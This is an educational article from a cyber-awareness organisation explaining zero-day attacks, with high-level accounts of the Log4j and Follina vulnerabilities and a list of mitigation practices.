A previously unknown loophole that is revealed by constantly probing the code by a determined hacker. A lot of effort is put in by the hacker, who scours through lines of code of applications and operating systems to find some weakness or flaw in the code. An array of reverse engineering techniques is used to force the system to reveal some crack in its defences that provide the hacker with a secret way to execute malicious code.
WHAT ARE ZERO-DAY ATTACKS?
They are called zero-day attacks because zero is the number of days that the developer has been aware of the vulnerability. With such attacks, the aim of cybercriminals is to exploit the vulnerability, to gain entry to a network and disrupt the functioning and the services of software companies, web browsers etc. They are also used to gather sensitive information, such as from governments.
Because these exploits are previously unknown, they provide an element of surprise, because it can take time to patch the weakness. Zero-day attacks can be useful when the attacker tells the victim about the vulnerability so that it can be patched, but they can also be quite dangerous if the attacker uses the vulnerability to execute code that is harmful, or sells the information to a zero-day broker on the dark web. Zero-day brokers are black-market vendors of such zero-day exploits, and they compile the inventory of zero-days with the intention of selling the information for the highest price.
FAMOUS EXAMPLES OF ZERO DAY ATTACKS
Log4j version 2.15, in 2021
Not a virus; but an open-source error logging service created by Apache and used by many companies and individuals. Therefore, it affected many corporations and users, whether they used Windows, Linux or Apple. Version 2.15 allowed attackers to have control over input data like JNDI (Java Naming and Directory Interface), who used it to create malicious input.
This was a security exploit, that enabled remote code execution vulnerabilities, which are of a very high-risk and high severity nature. It enabled cybercriminals to gain access to systems/networks and run code with system-level privileges. Used to steal data and also to launch denial of service attacks – it was exploited by everyone from nation states to cyber criminals who suddenly found that they had remote access to systems in technology, financial, healthcare companies.
It affected everything from cloud services, to developer tools to security devices. There was actually pre-packaged code, and script keys to take advantage of this exploit, available on the internet. It was used for crypto-mining, and developing malware for large-scale DoS (Denial of Service) attacks, ransomware and for stealing data. Once this exploit became known, Apache released a patch (Version 2.16) which disabled access to JNDI by default.
CVE-2022-30190 also called Follina, in 2022
CVE stands for Common Vulnerabilities and Exposures, a standardised method of defining vulnerabilities by Mitre. A central repository that lists and defines all the publicly exposed vulnerabilities found in different products, reported by the manufacturers/vendors of said products.
Follina or CVE-2022-30190 is the latest zero-day remote code execution flaw that was discovered by security researcher Kevin Beaumont, who reported the vulnerability to Microsoft on 12/04/2022. Follina abuses a Microsoft Office feature to retrieve an HTML file, which then uses the Microsoft Support Diagnostic Tool (MSDT) to execute malicious code on the system. Successfully exploiting this vulnerability allows an attacker to run arbitrary code with system level privileges, and they can then view, change or delete data and even install programs. Microsoft released a patch for CVE-2022-30190 on 14/06/2022.
What is remarkable about Follina is that it can be executed with a link in a Microsoft Word file. In fact, the vulnerability could be exploited in Office 2021, 2019, 2016 and even 2013. And the RTF or Rich Text Format is even more dangerous because it allows the malicious command to be executed just by previewing it in Microsoft Explorer, that is, just by hovering over the file icon with the mouse. The file does not even have to be clicked open.
WHAT CAN BE DONE?
While it is true that a solution cannot be devised without first having a problem, there are ways in which zero-day attacks can be mitigated.
- Testing the software regularly – so that any potential loopholes can be found before bad actors find ways to exploit them.
- Regular software updates – this is because threats are constantly emerging and once a vulnerability is exposed, companies quickly work to patch the hole so that users can continue to use their products without any problems.
- Monitoring threat intelligence feeds – The purpose is to find useful data about threats online.
- Perimeter firewalls – A useful mechanism for filtering out malicious incoming traffic before it crosses from a public to a private network.
- Preserve evidence – In the case of an attack, it is important to preserve evidence so that it can be analysed to prepare for future attacks.
- Threat Hunting – an active security exercise with the intent of rooting out any cyber-attacks that may have penetrated a network/system without raising any alarms.
- Emergency patches – to cover any holes that may have been left uncovered.
Author – Mr. Naman Sareen, Research Associate, CyberPeace Foundation